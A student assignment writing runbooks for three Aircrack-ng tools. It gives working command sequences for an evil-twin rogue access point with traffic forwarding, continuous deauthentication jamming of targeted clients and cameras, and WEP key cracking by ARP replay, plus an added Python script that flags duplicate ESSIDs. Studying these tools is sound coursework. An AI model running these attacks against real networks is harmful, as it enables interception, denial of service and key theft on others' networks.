
COURSE: 2021S-T1 ISN 1903 - Wireless and Mobile Device Security 02 (CSFM Group 2)

Assignment: Aircrack-ng Suite (Assignment 2)

Submitted By:
David Olaitan Aridiogo
Student ID: 774493
1. Choose three modules from the Aircrack-ng suite.
Answer: The three modules chosen from the Aircrack-ng suite are:
- Airbase-ng
- Airgraph-ng
- Aireplay-ng

2. Write a runbook covering the following for each of the tools:

a) What does the tool do?
b) What are the strengths of using the tool?
c) Installation steps…
d) Configuration steps…
Answer

Runbook for Airbase-ng


a) Function: Airbase-ng is a multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself. Its features are as follows:
- It implements the Caffe Latte WEP client attack
- It implements the Hirte WEP client attack
- It can cause the WPA/WPA2 handshake to be captured
- It can act as an ad-hoc Access Point
- It can act as a full Access Point
- It can filter by SSID or client MAC address
- It can manipulate and resend packets
- It can encrypt sent packets and decrypt received packets

b) Strength of Using Airbase-ng


Using Airbase-ng, one can pretend to be a legitimate access point and perform man-in-the-middle attacks on devices that connect to your system. This attack is also called the "Evil Twin Attack". Suppose someone in a Starbucks is trying to connect to its Wi-Fi: an attacker can create another access point with the same name (usually with better signal strength), making you think that the access point belongs to Starbucks. This makes it hard for regular users to differentiate between a legitimate access point and a rogue access point.

c)
d) Configuration steps for Airbase-ng
Step 1: Sniff the Air
- First, the victim AP's information must be observed.
- Set the Wi-Fi adapter to monitor mode. There are two options to do so; I prefer these commands:
"ifconfig wlan0 down"
"iwconfig wlan0 mode monitor"
"ifconfig wlan0 up"

Step 2: Set Up the DHCP Server

- To provide our fake AP with an internet connection we have to set up a DHCP server that configures the fake AP with an IP address and subnet.
- Check whether isc-dhcp-server is already installed. Open a new terminal:
"dpkg -s isc-dhcp-server | grep Status"
If it is not installed:
"apt-get install isc-dhcp-server"
Step 3: Create the Evil Twin
Now type in the second terminal:
"airbase-ng -e wireless -c 2 wlan0"
Here we have created the evil-twin AP.
To change the BSSID as well, and not just the ESSID, type:
"airbase-ng -e wireless -a 64:7C:34:92:2B:41 -c 2 wlan0"
For this attack it is not really necessary, though, and it only confuses matters while monitoring the results.

So here we started the evil-twin AP, and it has the BSSID C4:E9:84:0D:9C:FA.
To monitor the connections, we open a third terminal and type:
"airodump-ng --bssid C4:E9:84:0D:9C:FA -c 2 wlan0"
Term1: monitors the real AP
Term2: runs the fake AP
Term3: monitors the fake AP

Step 4: Provide Internet to the Eviltwin


airbase-ng provides us with a new network interface (at0) while it is running.
"ifconfig at0"
should show some output now, so we bring the interface up and give it an address:
"ifconfig at0 up"
"ifconfig at0 192.168.2.1 netmask 255.255.255.0"
Now start the DHCP server. Here the server is started with the edited dhcpd.conf:
"dhcpd -cf /etc/dhcp/dhcpd.conf"
To be sure the file is loaded correctly:
"service isc-dhcp-server restart"

Note: the screenshot for this step showed the wrong IP address; it should be 192.168.2.1.

Step 5: Configuring the Firewall


Type these commands:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD -j ACCEPT --in-interface at0
echo 1 > /proc/sys/net/ipv4/ip_forward
These configure the firewall to route all traffic from at0 to eth0 (masquerading it behind eth0's address). The last command tells the kernel: "act like a router and forward all traffic to its destination".

Step 6: Shoot Down the Connection


Open a fourth terminal and send deauthentication frames to the device that is still associated with the real AP:
"aireplay-ng --deauth 0 -a 64:7C:34:92:2B:41 -c F8:01:13:4A:BA:D7 wlan0"
--deauth 0 means that the frames are sent in an endless loop (or until we have the connection we want)
-a defines the BSSID of the AP
-c defines the MAC of the device we want to observe
We deauthenticate only a specific device so as not to draw too much attention to the network and clutter the result.

Runbook for Airgraph-ng
a) Function of Airgraph-ng: Airgraph-ng is a tool that generates graphs to visualize data captured by airodump-ng. It can create two types of graphs:
- CAPR: Client to Access Point Relationship, showing all the clients connected to the different access points
- CPG: Common Probe Graph, a graph centered on probed ESSIDs and the MAC addresses of the devices that probed for them
b) Strength of Using Airgraph-ng
We can't read the traffic flowing between devices, but we can watch
the relationship between Wi-Fi devices like laptops, smartphones, and
IoT products to learn about the network and the people behind them.
To understand how a network is connected, we can sniff the Wi-Fi
radio traffic in the area to discover which devices are currently
connected to an access point, building a list of relationships through
Airgraph-ng.
Airgraph-ng is pretty straightforward, as can be seen by its manual
page entry.

NAME
airgraph-ng - a 802.11 visualization utility

SYNOPSIS
airgraph-ng [options]

DESCRIPTION
airgraph-ng graphs the CSV file generated by Airodump-ng. The idea is that you are showing the relationships of the clients to the APs, so don't be shocked if you see only one mapping, as you may only have captured one client.

OPTIONS
-h Shows the help screen.
-i Airodump-ng CSV file
-o Output png file.
-g Choose the graph type. Current types are [CAPR (Client to AP Relationship) & CPG (Common probe graph)].
-a Print the about.

EXAMPLES
airgraph-ng -i dump-01.csv -o dump.png -g CAPR
airgraph-ng -i dump-01.csv -o dump.png -g CPG

c) Installation steps for Airgraph-ng


Quick install instructions for airgraph-ng on Ubuntu Server.
Step 1: Type or copy “sudo apt-get update -y”
Step 2: Type or copy “sudo apt-get install -y airgraph-ng”
Step 3: Check the system logs to confirm that there are no related errors. ZoomAdmin can be used to check the logs, manage servers, host multiple websites and apps on the servers, and more. The apps run in Docker containers.
Execute the commands above step by step.
Note: the -y flag means "assume yes" and install silently, without asking questions in most cases.
d) Configuration steps
Step 1: Update the System & Install if Needed
If running Kali Linux, everything needed ought to be installed already. First, we'll update and ensure we have the Aircrack-ng suite. To do so, connect your Kali computer to the internet and run the following commands in a terminal window.
apt update
apt upgrade
apt install aircrack-ng
Run the following commands to see the help output for each program.
airodump-ng --help
Airodump-ng 1.5.2 - (C) 2006-2018 Thomas d'Otreppe
https://www.aircrack-ng.org

usage: airodump-ng <options> <interface>[,<interface>,...]

Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix
-w : same as --write
--beacons : Record all beacons in dump file
--update <secs> : Display update delay in seconds
--showack : Prints ack/cts/rts statistics
-h : Hides known stations for --showack
-f <msecs> : Time in ms between hopping channels
--berlin <secs> : Time before removing the AP/client
from the screen when no more packets
are received (Default: 120 seconds)
-r <file> : Read packets from that file
-x <msecs> : Active Scanning Simulation
--manufacturer : Display manufacturer from IEEE OUI list
--uptime : Display AP Uptime from Beacon Timestamp
--wps : Display WPS information (if any)
--output-format
<formats> : Output format. Possible values:
pcap, ivs, csv, gps, kismet, netxml, logcsv
--ignore-negative-one : Removes the message that says
fixed channel <interface>: -1
--write-interval
<seconds> : Output file(s) write interval in seconds
--background <enable> : Override background detection.

Filter options:
--encrypt <suite> : Filter APs by cipher suite
--netmask <netmask> : Filter APs by mask
--bssid <bssid> : Filter APs by BSSID
--essid <essid> : Filter APs by ESSID
--essid-regex <regex> : Filter APs by ESSID using a regular
expression
-a : Filter unassociated clients

By default, airodump-ng hops on 2.4GHz channels.


We can make it capture on other/specific channel(s) by using:
--ht20 : Set channel to HT20 (802.11n)
--ht40- : Set channel to HT40- (802.11n)
--ht40+ : Set channel to HT40+ (802.11n)
--channel <channels> : Capture on specific channels
--band <abg> : Band on which airodump-ng should hop
-C <frequencies> : Uses these frequencies in MHz to hop
--cswitch <method> : Set channel switching method
0 : FIFO (default)
1 : Round Robin
2 : Hop on last
-s : same as --cswitch

--help : Displays this usage screen


airgraph-ng --help
Usage: airgraph-ng options [-o -i -g ]

Options:
-h, --help show this help message and exit
-o OUTPUT, --output=OUTPUT
Our Output Image ie... Image.png
-i INPUT, --dump=INPUT
Airodump txt file in CSV format. NOT the pcap
-g GRAPH_TYPE, --graph=GRAPH_TYPE
Graph Type Current [CAPR (Client to AP Relationship)
OR CPG (Common probe graph)]
If we see the help output for both Airodump-ng and Airgraph-ng, then we're ready
to start intercepting and interpreting packets!

Step 2: Plug in the Card & Enable Monitor Mode:


Plug in the wireless network adapter we intend to use to sniff Wi-Fi packets. This should be a wireless network adapter that is compatible with Kali Linux. The Alfa AWUS036NHA is a solid one to use, but there are plenty more that may fit your needs better.
Once we've plugged in the adapter, we can put it into monitor mode using another program installed with Aircrack-ng. We'll use Airmon-ng to put our card into monitor mode, after running ifconfig to get the name of our network adapter. In our example, the adapter is named "wlan2".
airmon-ng start wlan2
Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

PID Name
561 NetworkManager
627 wpa_supplicant
3561 dhclient

PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
phy5 wlan2 rt2800usb Ralink Technology, Corp. RT2870/RT3070

(mac80211 monitor mode vif enabled for [phy5]wlan2 on [phy5]wlan2mon)
(mac80211 station mode vif disabled for [phy5]wlan2)
Now, run ifconfig again. We should see that your card has "mon" added to the end of its name. This means that your card is now in wireless monitor mode, and we're ready to proceed to the next step.

Step 3: Run Airodump-ng & Save CSV File


Now that our wireless card can listen in on any Wi-Fi packet in the area, we need to start recording this information to a file. We'll use Airodump-ng to do this, effectively dumping all packets received on our network adapter to a file for us to interpret later.
Remembering the name of our wireless network adapter, which is now in monitor mode, run the following command to save all packets intercepted by the interface "wlan2mon" (or whatever yours is called) to a file named capturefile.
airodump-ng wlan2mon -w capturefilename
CH 10 ][ Elapsed: 4 mins ][ 2019-02-03 21:32

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

14:CC:20:6D:22:BA -26 69 0 0 8 130 WPA2 CCMP PSK CafeMak4_2.4G
AA:6B:AD:6F:AC:55 -31 136 0 0 6 65 WPA2 CCMP PSK DIRECT-HQHL-L9310CDW_BRac55
EC:1D:7F:F9:10:03 -33 159 0 0 6 65 WPA2 CCMP PSK cafemak_pwm
2C:FD:A1:E4:9D:50 -40 109 152 0 9 260 WPA2 CCMP PSK CafeMak1_2.4G
84:1B:5E:E9:8A:1A -52 136 3668 0 11 54e WPA2 CCMP PSK CafeMak6_2.4G
16:18:D6:04:F1:1E -58 54 2 0 1 195 WPA2 CCMP PSK 770staff1
26:18:D6:04:F1:1E -59 74 0 0 1 195 WPA2 CCMP PSK 770guest
F8:18:97:65:BC:F3 -59 50 0 0 1 130 WPA2 CCMP PSK ATT717_guest
06:18:D6:04:F1:1E -60 52 0 0 1 195 WPA2 CCMP PSK exec
04:18:D6:04:F1:1E -60 87 0 0 1 195 WPA2 CCMP PSK 770org
3C:36:E4:F7:6D:20 -61 84 0 0 6 130 WPA2 CCMP PSK ATT120
36:18:D6:04:EF:0F -62 71 0 0 6 195 WPA2 CCMP PSK <length: 0>
06:18:D6:04:EF:0F -62 66 0 0 6 195 WPA2 CCMP PSK exec
36:18:D6:04:F1:1E -62 64 0 0 1 195 WPA2 CCMP PSK <length: 0>
04:18:D6:04:EF:0F -63 123 0 0 6 195 WPA2 CCMP PSK 770org
F8:18:97:65:BC:F2 -64 46 5 0 1 130 WPA2 CCMP PSK ATT717
04:18:D6:04:2E:FA -64 44 0 0 1 195 WPA2 CCMP PSK rb
26:18:D6:04:EF:0F -64 97 0 0 6 195 WPA2 CCMP PSK 770guest
16:18:D6:04:EF:0F -64 78 0 0 6 195 WPA2 CCMP PSK 770staff1
A0:8C:FD:B7:9D:A9 -65 68 0 0 6 65 WPA2 CCMP PSK DIRECT-A8-HP OfficeJet 4650
E8:8D:28:60:BE:77 -68 63 3 0 6 195 WPA2 CCMP PSK Joel's Wi-Fi Network
When we're done collecting packets, we can type Ctrl-c to stop the capture. This will
generate a CSV file containing all the information we need.

Step 4: Generate a Graph of AP Relationships (Connected Devices)

Now, it's time to generate our first graph from the wireless data we've intercepted. We can think of this data as metadata: it tells us which devices were calling each other, but not what they were saying. First, we'll build a graph of the client-to-AP relationships. After locating the CSV file we created, run the following command in a terminal window to create a CAPR graph of which device is connected to which access point. Replace "CAPRintercept.png" with the name of the graph we want to create, and '/root/Desktop/cafemak-01.csv' with the path to the CSV file.
airgraph-ng -o CAPRintercept.png -i '/root/Desktop/cafemak-01.csv' -g CAPR
**** WARNING Images can be large, up to 12 Feet by 12 Feet****
Creating your Graph using, /root/Desktop/cafemak-01.csv and writing to, cafemak.png
Depending on your system this can take a bit. Please standby.......
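The CAPR and CPG graphs described in the Airgraph-ng section are built from the AP and station tables of the airodump-ng CSV, and the same AP table also shows the evil-twin situation described under Airbase-ng, where one ESSID is suddenly advertised by a second BSSID. The following Python is an added example, not code from the Aircrack-ng suite or from this assignment; the CSV it parses is constructed in airodump-ng's layout, and the function names are chosen here.

```python
"""Build the two relationships airgraph-ng draws, CAPR (client to AP) and
CPG (common probe graph), from an airodump-ng CSV, and flag ESSIDs advertised
by more than one BSSID, the shape an Airbase-ng style evil twin has in a
capture. Added example, not part of the Aircrack-ng suite; CSV is constructed."""
import csv
import io
from collections import defaultdict

# Constructed sample in airodump-ng's layout: AP table, blank line, station table.
# AA:BB:CC:00:00:02 advertises "CafeNet" a second time, open and louder: a twin.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2021-05-01 10:00:00, 2021-05-01 10:05:00,  6, 130, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   7, CafeNet,
AA:BB:CC:00:00:02, 2021-05-01 10:03:00, 2021-05-01 10:05:00,  6,  54, OPN ,     ,    , -25,   40,  0,   0.  0.  0.  0,   7, CafeNet,
AA:BB:CC:00:00:03, 2021-05-01 10:00:00, 2021-05-01 10:05:00, 11, 195, WPA2, CCMP, PSK, -60,   90,  0,   0.  0.  0.  0,   5, Staff,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:00:00:01, 2021-05-01 10:00:10, 2021-05-01 10:05:00, -50,  300, AA:BB:CC:00:00:01, CafeNet
11:22:33:00:00:02, 2021-05-01 10:01:00, 2021-05-01 10:05:00, -45,   20, (not associated) , CafeNet,HomeWifi
11:22:33:00:00:03, 2021-05-01 10:02:00, 2021-05-01 10:05:00, -70,   55, AA:BB:CC:00:00:03,
"""

def _rows(section):
    """Yield stripped, non-empty CSV rows of one section, skipping its header."""
    for row in csv.reader(io.StringIO(section), skipinitialspace=True):
        row = [f.strip() for f in row]
        if row and row[0] not in ("", "BSSID", "Station MAC"):
            yield row

def parse_airodump_csv(text):
    """Return (aps, stations). aps: BSSID -> essid/channel/privacy;
    stations: client MAC -> associated BSSID and the ESSIDs it probed for."""
    text = text.replace("\r\n", "\n").strip("\n")  # real files open with a blank line
    ap_part, _, sta_part = text.partition("\n\n")
    aps = {r[0]: {"essid": r[13], "channel": r[3], "privacy": r[5]}
           for r in _rows(ap_part) if len(r) >= 14}
    stations = {r[0]: {"bssid": r[5], "probes": [p for p in r[6:] if p]}
                for r in _rows(sta_part) if len(r) >= 6}
    return aps, stations

def capr(aps, stations):
    """Client to AP Relationship: BSSID -> clients associated with it."""
    rel = defaultdict(list)
    for mac, sta in stations.items():
        if sta["bssid"] in aps:
            rel[sta["bssid"]].append(mac)
    return dict(rel)

def cpg(stations):
    """Common Probe Graph: probed ESSID -> clients that asked for it."""
    rel = defaultdict(list)
    for mac, sta in stations.items():
        for essid in sta["probes"]:
            rel[essid].append(mac)
    return dict(rel)

def essid_collisions(aps):
    """ESSIDs seen from more than one BSSID, with each BSSID's privacy and
    channel. A second BSSID with weaker security (OPN beside WPA2) is the
    classic evil-twin signature and deserves a closer look."""
    by_essid = defaultdict(list)
    for bssid, ap in aps.items():
        if ap["essid"]:
            by_essid[ap["essid"]].append((bssid, ap["privacy"], ap["channel"]))
    return {e: v for e, v in by_essid.items() if len(v) > 1}

if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    print("CAPR:", capr(aps, stations), "CPG:", cpg(stations))
    print("Duplicate ESSIDs:", essid_collisions(aps))
```

Point `parse_airodump_csv` at the contents of a real `<prefix>-01.csv` written by `airodump-ng -w` to get the same three views of a live capture.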

Runbook for Aireplay-ng

a) Function of Aireplay-ng: Aireplay-ng is used to generate rogue wireless traffic. It can be used along with aircrack-ng to crack WEP and WPA keys. The main purpose of aireplay-ng is to inject frames. There are several different types of powerful attacks that can be performed using aireplay-ng, such as the deauthentication attack, which helps in capturing WPA handshake data, or the fake authentication attack, in which packets are injected into the network access point by authenticating to it to create and capture new IVs.
b) Strength of using Aireplay-ng
Certain network cards do not support packet injection, and aireplay-ng only works with network cards that support this feature. The first thing to do before performing an attack is to check whether your network card supports injection. You can do this simply by running an injection test with the following command: “ubuntu@ubuntu:~$ sudo aireplay-ng -9 wlan0”. Moreover, Aireplay-ng is a useful tool that helps in cracking WPA/WPA2-PSK and WEP keys by performing various powerful attacks on wireless networks. In this way, aireplay-ng generates important traffic data to be used later on. Aireplay-ng also comes with aircrack-ng, a very powerful software suite consisting of a detector, a sniffer, and WPA and WEP/WPS cracking and analysis tools.

c) Installation steps for Aireplay-ng


First of all, we need the following:
1. Ubuntu Intrepid
2. AR5007EG (AR242X Atheros chipset)
3. ath5k wireless driver, installed and working
4. Pre-installed aircrack-ng 1:1.0~rc1-2ubuntu1 (sudo apt-get install aircrack-ng)
Equipment Used
- MAC address of my laptop: 00:19:7E:2F:3E:4C (run ifconfig in a terminal)
- BSSID (MAC address of the access point/AP): 00:17:3F:06:A3:00
- ESSID (wireless network name): belkin54g
- AP channel = access point channel (11)
- Wireless interface (mon0)
Step 1 – Start the wireless interface in monitor mode on the AP channel
Go to the terminal and type this command.
$ sudo airmon-ng start wlan0 11
Step 2 – Use airodump-ng to capture packets
Run this command in the terminal again.
sudo airodump-ng -c 11 --bssid 00:17:3F:06:A3:00 -w x mon0
Where:
- -c = the channel of the AP
- --bssid = MAC address of the AP
- -w = the instruction to save the file
- x = the file name
- mon0 = wireless interface (monitor mode)
Step 3 – Use aireplay-ng to deauthenticate/associate with the AP
Open a new terminal and type this command:
sudo aireplay-ng -1 6000 -o 1 -q 10 -e belkin54g -a 00:17:3F:06:A3:00 -h 00:19:7E:2F:3E:4C mon0
Where:
- -1 = fake authentication
- 6000 = re-authenticate every 6000 seconds
- -o 1 = send only one set of packets at a time
- -q 10 = send a keep-alive packet every 10 seconds
- -e = wireless network name
- -a = AP MAC address
- -h = my wireless card's MAC address
If you have a problem, then TRY TO DO TROUBLESHOOTING AND READ THE AIRCRACK-NG TUTORIALS here, AS THAT IS BEYOND MY EXPERIENCE.
Failing this step is the biggest reason why injection fails. Some APs may enable MAC filtering; if this happens, we should use a MAC from an already-associated client.
Step 4 – Start aireplay-ng in ARP request replay mode
This step listens for ARP requests and re-injects them back into the network. The reason is that the AP will normally re-broadcast them and generate a new IV. The objective is to obtain a large number of IVs in a short period of time.
Open a new terminal and type this command:
sudo aireplay-ng -3 -b 00:17:3F:06:A3:00 -h 00:19:7E:2F:3E:4C mon0
Step 5 – Cracking the password
Then start a new terminal again and run this command:
sudo aircrack-ng -z *.cap
Where:
- -z = invokes the PTW WEP cracking method
- *.cap = all capture files saved by airodump-ng (normally in your home directory)
d) Configuration steps for Aireplay-ng
Step 1: Update Kali
With those two requirements taken care of, we can get started by making sure our system is fully up to date. In Kali, the command to do so is shown below.
apt update
After this, we should be ready to go, but make sure that we have a target we have permission to access (and deny service to) with the Aireplay-ng tool. While we can scan any network we want with Kismet, Aireplay-ng will execute a denial-of-service attack that is illegal to run against a network we don't have permission to audit.
Step 2: Choosing the Weapon
The first step in identifying wireless targets is to conduct passive recon on the wireless
environment. To do this, we can use a program called Kismet which can perform wireless
signals intelligence in a passive and undetectable fashion. The advantage of this is that by
simply being in proximity to your target, you can observe the wireless traffic in the area
and later parse the information to find interesting devices.
An alternative to Kismet is running Arp-scan, which can be configured in a number of
ways to filter information further about the networks you discover. While this does work,
sometimes the output takes more work to decipher. We'll be using Kismet, however, for
the rest of this guide.

Step 3: Put the Wireless Adapter in Monitor Mode


To start scanning with either tool, we'll need to put our wireless network adapter into monitor mode. We can do so by typing the following, assuming wlan0 is the name of your wireless card. You can get the name of your wireless card by running ifconfig or ip a to list the available network interfaces.
Step 4: Start Up Kismet on the Network
Once monitor mode is taken care of, we can start Kismet by typing the following.
kismet -c wlan0mon
In this command, we specify which network adapter to use with Kismet via the -c (client) flag. We should see something like the output below. We can press Tab, then Return, to close the console window and show the main screen.
Step 5: Discover Wireless Security Cameras with Kismet
We can now scroll through the network and attempt to identify interesting devices. If you
can't do this, you may need to enable more options under the "Preferences" menu to see
the source of packets.

Step 6: Execute the Deauthentication Attack


To begin disrupting the connection to the device we've targeted, we'll need to lock our wireless card to the channel we observed traffic on. We can do this by typing the following command, assuming we want to lock the network adapter to channel 6.
airmon-ng start wlan0mon 6

Now that our card is on the correct channel, we can issue the command that will disconnect the device we've located. The command we will use to do this is formatted like this:
“aireplay-ng -0 0 -a <bssid of access point> -c <bssid of client device> <name of the adapter>”
To break down what the command above is doing:
- -0 sets the attack option to option 0, a deauthentication attack which will send authentication packets pretending to be from the access point to the device. The 0 that follows indicates to send a continuous stream of deauthentication packets, but you can also choose a fixed number to send here.
- -a sets the BSSID of the Wi-Fi access point that the device is connected to.
- -c sets the BSSID of the device we wish to kick off the network.
Our final command for our example would be as follows.
“aireplay-ng -0 0 -a f2:9f:c2:34:55:64 -c a4:14:37:44:1f:ac wlan0mon”
Once this command executes, it will continue to jam the Wi-Fi connection between the two devices until you cancel the command by hitting the Ctrl-C key combination.

